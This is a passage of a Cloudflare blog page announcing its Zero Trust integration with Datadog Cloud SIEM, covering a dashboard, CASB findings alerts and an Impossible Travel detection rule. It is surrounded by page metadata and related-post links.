viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>In your Datadog dashboard, locate and install the Cloudflare Tile within the Datadog Integration catalog. At this stage, Datadog’s out-of-the-box log processing <a href=\"https://docs.datadoghq.com/logs/log_configuration/pipelines/?tab=source\">pipeline</a> will automatically parse and normalize your Cloudflare Zero Trust logs.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"analyze-and-correlate-your-zero-trust-logs-with-datadog-cloud-siems-out-of-the-box-content\">Analyze and correlate your Zero Trust logs with Datadog Cloud SIEM's out-of-the-box content</h3>\n <a href=\"#analyze-and-correlate-your-zero-trust-logs-with-datadog-cloud-siems-out-of-the-box-content\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Our new and improved integration with Datadog enables security teams to quickly and easily monitor their Zero Trust components with the Cloudflare Content Pack. This includes the out-of-the-box dashboard that now features a Zero Trust section highlighting various widgets about activity across the applications, devices, and users in your Cloudflare Zero Trust ecosystem. This section gives you a holistic view, helping you spot and respond to anomalies quickly.</p>\n <figure class=\"kg-card kg-image-card kg-width-wide\">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4ufPwaIiXySgUYcLsvXbiz/131481c545a01474ea1f26f50308ccf3/image1-2.png\" alt=\"\" class=\"kg-image\" width=\"1728\" height=\"1117\" loading=\"lazy\"/>\n \n </figure>\n <div class=\"flex anchor relative\">\n <h3 id=\"security-detections-built-for-casb\">Security detections built for CASB</h3>\n <a href=\"#security-detections-built-for-casb\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>As Enterprises use more SaaS applications, it becomes more critical to have insights and control for data at-rest. Cloudflare CASB findings do just that by providing security risk insights for all integrated SaaS applications.</p><p>With this new integration, Datadog now offers an out-of-the-box detection rule that detects any CASB findings. The alert is triggered at different severity levels for any CASB security finding that could indicate suspicious activity within an integrated SaaS app, like Microsoft 365 and Google Workspace. In the example below, the CASB finding points to an asset whose Google Workspace Domain Record is missing.</p><p>This detection is helpful in identifying and remedying misconfigurations or any security issues saving time and reducing the possibility of security breaches.</p>\n <figure class=\"kg-card kg-image-card kg-width-wide\">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5NlUJLmZa43B1LqkTKmdMc/75e15e8a2d66ce46093e5198a6450d94/image2.png\" alt=\"\" class=\"kg-image\" width=\"1776\" height=\"1024\" loading=\"lazy\"/>\n \n </figure>\n <div class=\"flex anchor relative\">\n <h3 id=\"security-detections-for-impossible-travel\">Security detections for Impossible Travel</h3>\n <a href=\"#security-detections-for-impossible-travel\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>One of the most common security issues can show up in surprisingly simple ways. For example, could be a user that seemingly logs in from one location only to login shortly after from a location physically too far away. Datadog’s new detection rule addresses exactly this scenario with their <a href=\"https://docs.datadoghq.com/security/default_rules/cloudflare-impossible-travel\">Impossible Travel detection rule</a>. If Datadog Cloud SIEM determines that two consecutive loglines for a user indicate impossible travel of more than 500 km at over 1,000 km/h, the security alert is triggered. An admin can then determine if it is a security breach and take actions accordingly.</p>\n <figure class=\"kg-card kg-image-card kg-width-wide\">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/56UXWQZRCjTg0y0PThuDf9/b033359bf8872fc79a8eb0015fbb8416/image3.png\" alt=\"\" class=\"kg-image\" width=\"1274\" height=\"645\" loading=\"lazy\"/>\n \n </figure>\n <div class=\"flex anchor relative\">\n <h2 id=\"whats-next\">What’s next</h2>\n <a href=\"#whats-next\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Customers of Cloudflare and Datadog can now gain a more comprehensive view of their products and security posture with the enhanced dashboards and the new detection rules. We are excited to work on adding more value for our customers and develop unique detection rules.</p><p>If you are a Cloudflare customer using Datadog, explore the new integration starting <a href=\"https://docs.datadoghq.com/integrations/cloudflare/\">today</a>.</p>"],"published_at":[0,"2023-08-03T14:00:33.000+01:00"],"updated_at":[0,"2024-10-09T23:25:10.392Z"],"feature_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1Cu0rknSi4Vwq1Govh3aak/a4251d1b975519df67624e3c22ab6200/integrate-cloudflare-zero-trust-with-datadog-cloud-siem.png"],"tags":[1,[[0,{"id":[0,"4fkY3bvsgn5JfTgXxTZHIR"],"name":[0,"Logs"],"slug":[0,"logs"]}],[0,{"id":[0,"J61Eszqn98amrYHq4IhTx"],"name":[0,"Zero Trust"],"slug":[0,"zero-trust"]}],[0,{"id":[0,"uegedi11MDlivX9pYn2ri"],"name":[0,"Dashboard"],"slug":[0,"dashboard-tag"]}],[0,{"id":[0,"5OywGP63AdM9Umyvaku8OP"],"name":[0,"Connectivity Cloud"],"slug":[0,"connectivity-cloud"]}]]],"relatedTags":[0],"authors":[1,[[0,{"name":[0,"Mythili Prabhu"],"slug":[0,"mythili"],"bio":[0,null],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7SQKWPwCqqjj4hYR7JufX/564818f41eb2741b8f174e444d7e7cf4/mythili.png"],"location":[0,"San Jose, California"],"website":[0,null],"twitter":[0,null],"facebook":[0,null]}],[0,{"name":[0,"Nimisha Saxena (Guest Author)"],"slug":[0,"nimisha"],"bio":[0,null],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4Dvw5zxu2EY2HIKW4XO76f/87f3a4dfb573cd4b8b932121146e4716/nimisha.jpeg"],"location":[0,null],"website":[0,"https://www.datadoghq.com/"],"twitter":[0,null],"facebook":[0,null]}]]],"meta_description":[0,"Today, we are very excited to announce the general availability of Cloudflare Zero Trust Integration with Datadog."],"primary_author":[0,{}],"localeList":[0,{"name":[0,"Integrate Cloudflare Zero Trust with Datadog Cloud SIEM Config"],"enUS":[0,"English for Locale"],"zhCN":[0,"Translated for Locale"],"zhHansCN":[0,"No Page for Locale"],"zhTW":[0,"Translated for Locale"],"frFR":[0,"Translated for Locale"],"deDE":[0,"Translated for Locale"],"itIT":[0,"No Page for Locale"],"jaJP":[0,"Translated for Locale"],"koKR":[0,"Translated for Locale"],"ptBR":[0,"No Page for Locale"],"esLA":[0,"No Page for Locale"],"esES":[0,"No Page for Locale"],"enAU":[0,"No Page for Locale"],"enCA":[0,"No Page for Locale"],"enIN":[0,"No Page for Locale"],"enGB":[0,"No Page for Locale"],"idID":[0,"No Page for Locale"],"ruRU":[0,"No Page for Locale"],"svSE":[0,"No Page for Locale"],"viVN":[0,"No Page for Locale"],"plPL":[0,"No Page for Locale"],"arAR":[0,"No Page for Locale"],"nlNL":[0,"No Page for Locale"],"thTH":[0,"No Page for Locale"],"trTR":[0,"No Page for Locale"],"heIL":[0,"No Page for Locale"],"lvLV":[0,"No Page for Locale"],"etEE":[0,"No Page for Locale"],"ltLT":[0,"No Page for Locale"]}],"url":[0,"https://blog.cloudflare.com/integrate-cloudflare-zero-trust-with-datadog-cloud-siem"],"metadata":[0,{"title":[0,"Integrate Cloudflare Zero Trust with Datadog Cloud SIEM"],"description":[0,"Today, we are very excited to announce the general availability of Cloudflare Zero Trust Integration with Datadog."],"imgPreview":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6gPcHPrucQMQEmTxTu8tfP/b41b459d30af3513add8755f4ffcac7d/integrate-cloudflare-zero-trust-with-datadog-cloud-siem-3p8AZV.png"]}]}]]],"translations":[0,{"posts.by":[0,"By"],"footer.gdpr":[0,"GDPR"],"lang_blurb1":[0,"This post is also available in {lang1}."],"lang_blurb2":[0,"This post is also available in {lang1} and {lang2}."],"lang_blurb3":[0,"This post is also available in {lang1}, {lang2} and {lang3}."],"footer.press":[0,"Press"],"header.title":[0,"The Cloudflare Blog"],"search.clear":[0,"Clear"],"search.filter":[0,"Filter"],"search.source":[0,"Source"],"footer.careers":[0,"Careers"],"footer.company":[0,"Company"],"footer.support":[0,"Support"],"footer.the_net":[0,"theNet"],"search.filters":[0,"Filters"],"footer.our_team":[0,"Our team"],"footer.webinars":[0,"Webinars"],"page.more_posts":[0,"More posts"],"posts.time_read":[0,"{time} min read"],"search.language":[0,"Language"],"footer.community":[0,"Community"],"footer.resources":[0,"Resources"],"footer.solutions":[0,"Solutions"],"footer.trademark":[0,"Trademark"],"header.subscribe":[0,"Subscribe"],"footer.compliance":[0,"Compliance"],"footer.free_plans":[0,"Free plans"],"footer.impact_ESG":[0,"Impact/ESG"],"posts.follow_on_X":[0,"Follow on X"],"footer.help_center":[0,"Help center"],"footer.network_map":[0,"Network Map"],"header.please_wait":[0,"Please Wait"],"page.related_posts":[0,"Related posts"],"search.result_stat":[0,"Results <strong>{search_range}</strong> of <strong>{search_total}</strong> for <strong>{search_keyword}</strong>"],"footer.case_studies":[0,"Case Studies"],"footer.connect_2024":[0,"Connect 2024"],"footer.terms_of_use":[0,"Terms of Use"],"footer.white_papers":[0,"White Papers"],"footer.cloudflare_tv":[0,"Cloudflare TV"],"footer.community_hub":[0,"Community Hub"],"footer.compare_plans":[0,"Compare plans"],"footer.contact_sales":[0,"Contact Sales"],"header.contact_sales":[0,"Contact Sales"],"header.email_address":[0,"Email Address"],"page.error.not_found":[0,"Page not found"],"footer.developer_docs":[0,"Developer docs"],"footer.privacy_policy":[0,"Privacy Policy"],"footer.request_a_demo":[0,"Request a demo"],"page.continue_reading":[0,"Continue reading"],"footer.analysts_report":[0,"Analyst reports"],"footer.for_enterprises":[0,"For enterprises"],"footer.getting_started":[0,"Getting Started"],"footer.learning_center":[0,"Learning Center"],"footer.project_galileo":[0,"Project Galileo"],"pagination.newer_posts":[0,"Newer Posts"],"pagination.older_posts":[0,"Older Posts"],"posts.social_buttons.x":[0,"Discuss on X"],"search.icon_aria_label":[0,"Search"],"search.source_location":[0,"Source/Location"],"footer.about_cloudflare":[0,"About Cloudflare"],"footer.athenian_project":[0,"Athenian Project"],"footer.become_a_partner":[0,"Become a partner"],"footer.cloudflare_radar":[0,"Cloudflare Radar"],"footer.network_services":[0,"Network services"],"footer.trust_and_safety":[0,"Trust & Safety"],"header.get_started_free":[0,"Get Started Free"],"page.search.placeholder":[0,"Search Cloudflare"],"footer.cloudflare_status":[0,"Cloudflare Status"],"footer.cookie_preference":[0,"Cookie Preferences"],"header.valid_email_error":[0,"Must be valid email."],"search.result_stat_empty":[0,"Results <strong>{search_range}</strong> of <strong>{search_total}</strong>"],"footer.connectivity_cloud":[0,"Connectivity cloud"],"footer.developer_services":[0,"Developer services"],"footer.investor_relations":[0,"Investor relations"],"page.not_found.error_code":[0,"Error Code: 404"],"search.autocomplete_title":[0,"Insert a query. Press enter to send"],"footer.logos_and_press_kit":[0,"Logos & press kit"],"footer.application_services":[0,"Application services"],"footer.get_a_recommendation":[0,"Get a recommendation"],"posts.social_buttons.reddit":[0,"Discuss on Reddit"],"footer.sse_and_sase_services":[0,"SSE and SASE services"],"page.not_found.outdated_link":[0,"You may have used an outdated link, or you may have typed the address incorrectly."],"footer.report_security_issues":[0,"Report Security Issues"],"page.error.error_message_page":[0,"Sorry, we can't find the page you are looking for."],"header.subscribe_notifications":[0,"Subscribe to receive notifications of new posts:"],"footer.cloudflare_for_campaigns":[0,"Cloudflare for Campaigns"],"header.subscription_confimation":[0,"Subscription confirmed. Thank you for subscribing!"],"posts.social_buttons.hackernews":[0,"Discuss on Hacker News"],"footer.diversity_equity_inclusion":[0,"Diversity, equity & inclusion"],"footer.critical_infrastructure_defense_project":[0,"Critical Infrastructure Defense Project"]}]}" ssr client="load" opts="{"name":"MorePosts","value":true}" await-children> <div class="w-100 bt-l b--gray8"> <h3 data-testid="more-posts-title" class="orange fw5 f4 ph3 mt4">MORE POSTS</h3> </div> <article data-testid="more-posts-article" class="w-100 w-100-m ph3 mb4"> <p class="f3 fw5 gray1" data-iso-date="2024-09-11T14:00+01:00">September 11, 2024 1:00 PM</p><a href="https://blog-cloudflare-com.translate.goog/customers-get-increased-integration-with-cloudflare-email-security-and-zero-trust/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline gray1 f4 fw5"><h6 class="gray1 f4 fw5 mt2">Customers get increased integration with Cloudflare Email Security and Zero Trust through expanded partnership with CrowdStrike</h6></a> <p class="gray1 lh-copy">This post explains how our integrations with CrowdStrike Falcon® Next-Gen SIEM allow customers to identify and investigate risky user behavior and analyze data combined with other log sources to uncover hidden threats.<!-- -->...</p> <ul class="flex pl0 fw6 f2"> <span>By<!-- --> </span> <li class="list flex items-center"> <div class="author-name-tooltip"> <a href="https://blog-cloudflare-com.translate.goog/author/corey-mahan/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 f2 black no-underline">Corey Mahan</a> </div></li> <li class="list flex items-center"> <div class="author-name-tooltip"> <span class="fw5 f2 black no-underline">, </span><a href="https://blog-cloudflare-com.translate.goog/author/andrew-meyer/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 f2 black no-underline">Andrew Meyer</a> </div></li> <li class="list flex items-center"> <div class="author-name-tooltip"> <span class="fw5 f2 black no-underline">, </span><a href="https://blog-cloudflare-com.translate.goog/author/ayush/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 f2 black no-underline">Ayush Kumar</a> </div></li> <li class="list flex items-center"> <div class="author-name-tooltip"> <span class="fw5 f2 black no-underline">, </span><a href="https://blog-cloudflare-com.translate.goog/author/michael-mcgrory/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 f2 black no-underline">Michael Mcgrory</a> </div></li> <li class="list flex items-center"> <div class="author-name-tooltip"> <span class="fw5 f2 black no-underline">, </span><a href="https://blog-cloudflare-com.translate.goog/author/gavin/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 f2 black no-underline">Gavin Chen</a> </div></li> </ul> <div class="flex flex-row flex-wrap"> <div> <a href="https://blog-cloudflare-com.translate.goog/tag/partners/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Partners</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/crowdstrike/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">CrowdStrike</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/zero-trust/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Zero Trust</a> </div> </div> </article> <article data-testid="more-posts-article" class="w-100 w-100-m ph3 mb4"> <p class="f3 fw5 gray1" data-iso-date="2024-07-16T14:02:00.000+01:00">July 16, 2024 1:02 PM</p><a href="https://blog-cloudflare-com.translate.goog/eliminating-hardware-with-load-balancing-and-cloudflare-one/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline gray1 f4 fw5"><h6 class="gray1 f4 fw5 mt2">Eliminating hardware with Load Balancing and Cloudflare One</h6></a> <p class="gray1 lh-copy">Cloudflare is adding support for end-to-end private traffic flows to our local traffic management (LTM) load balancing solution, and allowing for the replacement of hardware load balancers<!-- -->...</p> <ul class="flex pl0 fw6 f2"> <span>By<!-- --> </span> <li class="list flex items-center"> <div class="author-name-tooltip"> <a href="https://blog-cloudflare-com.translate.goog/author/noah-crouch/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 f2 black no-underline">Noah Crouch</a> </div></li> </ul> <div class="flex flex-row flex-wrap"> <div> <a href="https://blog-cloudflare-com.translate.goog/tag/cloudflare-one/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Cloudflare One</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/magic-wan/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Magic WAN</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/warp/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">WARP</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/sase/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">SASE</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/loadbalancing/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Load Balancing</a> </div> </div> </article> <article data-testid="more-posts-article" class="w-100 w-100-m ph3 mb4"> <p class="f3 fw5 gray1" data-iso-date="2024-05-30T13:12:02.000+01:00">May 30, 2024 12:12 PM</p><a href="https://blog-cloudflare-com.translate.goog/cloudflare-acquires-bastionzero/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline gray1 f4 fw5"><h6 class="gray1 f4 fw5 mt2">Cloudflare acquires BastionZero to extend Zero Trust access to IT infrastructure</h6></a> <p class="gray1 lh-copy">We’re excited to announce that BastionZero, a Zero Trust infrastructure access platform, has joined Cloudflare. This acquisition extends our Zero Trust Network Access (ZTNA) flows with native access management for infrastructure like servers, Kubernetes clusters, and databases<!-- -->...</p> <ul class="flex pl0 fw6 f2"> <span>By<!-- --> </span> <li class="list flex items-center"> <div class="author-name-tooltip"> <a href="https://blog-cloudflare-com.translate.goog/author/kenny/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 f2 black no-underline">Kenny Johnson</a> </div></li> <li class="list flex items-center"> <div class="author-name-tooltip"> <span class="fw5 f2 black no-underline">, </span><a href="https://blog-cloudflare-com.translate.goog/author/michael-keane/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 f2 black no-underline">Michael Keane</a> </div></li> </ul> <div class="flex flex-row flex-wrap"> <div> <a href="https://blog-cloudflare-com.translate.goog/tag/acquisitions/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Acquisitions</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/zero-trust/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Zero Trust</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/sase/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">SASE</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/security/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Security</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/cloudflare-access/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Cloudflare Access</a> </div> </div> </article> <article data-testid="more-posts-article" class="w-100 w-100-m ph3 mb4"> <p class="f3 fw5 gray1" data-iso-date="2024-04-18T15:58:23.000+01:00">April 18, 2024 2:58 PM</p><a href="https://blog-cloudflare-com.translate.goog/cloudflare-sse-gartner-magic-quadrant-2024/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline gray1 f4 fw5"><h6 class="gray1 f4 fw5 mt2">Cloudflare named in 2024 Gartner® Magic Quadrant™ for Security Service Edge</h6></a> <p class="gray1 lh-copy">Gartner has once again named Cloudflare to the Gartner® Magic Quadrant™ for Security Service Edge (SSE) report<!-- -->...</p> <ul class="flex pl0 fw6 f2"> <span>By<!-- --> </span> <li class="list flex items-center"> <div class="author-name-tooltip"> <a href="https://blog-cloudflare-com.translate.goog/author/sam/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 f2 black no-underline">Sam Rhea</a> </div></li> </ul> <div class="flex flex-row flex-wrap"> <div> <a href="https://blog-cloudflare-com.translate.goog/tag/cloudflare-one/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Cloudflare One</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/zero-trust/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Zero Trust</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/security-service-edge/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Security Service Edge</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/sse/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">SSE</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/gartner/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Gartner</a> </div> </div> </article> <article data-testid="more-posts-article" class="w-100 w-100-m ph3 mb4"> <p class="f3 fw5 gray1" data-iso-date="2024-03-20T13:00:05.000+00:00">March 20, 2024 1:00 PM</p><a href="https://blog-cloudflare-com.translate.goog/introducing-warp-connector-paving-the-path-to-any-to-any-connectivity-2/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline gray1 f4 fw5"><h6 class="gray1 f4 fw5 mt2">Introducing WARP Connector: paving the path to any-to-any connectivity</h6></a> <p class="gray1 lh-copy">Starting today, Zero Trust administrators can deploy our new WARP Connector for simplified any-to-any connectivity<!-- -->...</p> <ul class="flex pl0 fw6 f2"> <span>By<!-- --> </span> <li class="list flex items-center"> <div class="author-name-tooltip"> <a href="https://blog-cloudflare-com.translate.goog/author/abe/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 f2 black no-underline">Abe Carryl</a> </div></li> <li class="list flex items-center"> <div class="author-name-tooltip"> <span class="fw5 f2 black no-underline">, </span><a href="https://blog-cloudflare-com.translate.goog/author/janani/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 f2 black no-underline">Janani Rajendiran</a> </div></li> </ul> <div class="flex flex-row flex-wrap"> <div> <a href="https://blog-cloudflare-com.translate.goog/tag/cloudflare-tunnel/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Cloudflare Tunnel</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/product-news/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Product News</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/warp/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">WARP</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/zero-trust/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Zero Trust</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/sase/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">SASE</a> </div> </div> </article> <article data-testid="more-posts-article" class="w-100 w-100-m ph3 mb4"> <p class="f3 fw5 gray1" data-iso-date="2024-03-11T14:00:05.000+00:00">March 11, 2024 2:00 PM</p><a href="https://blog-cloudflare-com.translate.goog/security-week-2024-wrap-up/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline gray1 f4 fw5"><h6 class="gray1 f4 fw5 mt2">Security Week 2024 wrap up</h6></a> <p class="gray1 lh-copy">A summary of the blog posts and product announcements released during Security Week 2024<!-- -->...</p> <ul class="flex pl0 fw6 f2"> <span>By<!-- --> </span> <li class="list flex items-center"> <div class="author-name-tooltip"> <a href="https://blog-cloudflare-com.translate.goog/author/daniele/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" 